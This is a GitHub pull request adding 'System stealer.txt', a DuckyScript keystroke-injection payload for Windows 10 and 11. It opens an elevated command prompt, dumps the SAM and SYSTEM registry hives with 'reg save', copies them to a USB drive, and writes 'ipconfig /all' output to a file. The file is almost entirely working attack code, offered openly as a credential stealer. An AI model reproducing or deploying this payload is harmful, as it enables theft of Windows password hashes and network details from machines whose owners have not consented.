Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

System stealer.txt #428

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
165 changes: 165 additions & 0 deletions System stealer.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,165 @@
REM Title: system stealear
REM Author: youssef mohamed fathy
REM Description: steal windows sam and system files
REM Target: WINDOWS 10,11
REM Requirements: usb flash drive

DELAY 2000

CONTROL-ESC

DELAY 200

UPARROW

DELAY 200

UPARROW

DELAY 200

UPARROW

DELAY 200

UPARROW

DELAY 200

PAGEUP

CTRL-SHIFT

DELAY 2000

ENTER

DELAY 3000

LEFTARROW

DELAY 3000

ENTER

STRING reg save HKLM\sam ./sam.save
ENTER
STRING reg save HKLM\system ./system.save

ENTER

DELAY 2000

STRING explorer .

ENTER

DELAY 3000

CTRL-F

DELAY 2000

STRING sam.save

ENTER

DELAY 1000

DOWNARROW

CTRL-C

DELAY 2000

REM you can replace ctrl-alt-z with your usb flash drive shortcut

CTRL-ALT-Z

DELAY 1000

CTRL-V

DELAY 2000

WINDOWS-S

STRING cmd

ENTER

DELAY 2000

STRING explorer .

DELAY 2000

CTRL-F

DELAY 2000

STRING system.save

ENTER

DELAY 2000

DOWNARROW

DELAY 1000

CTRL-C

DELAY 2000

CTRL-ALT-Z

DELAY 3000

CTRL-V

ALT-F4

REM steal ip configuration

WINDOWS-r

STRING cmd

ENTER

DELAY 2000

REM replace usb drive with your usb name

STRING cd userprofile/(usb drive)

ENTER

DELAY 5000

STRING ipconfig /all

ENTER

DELAY 6000

STRING ipconfig /all > Data.txt

ENTER

DELAY 1000

ALT-f4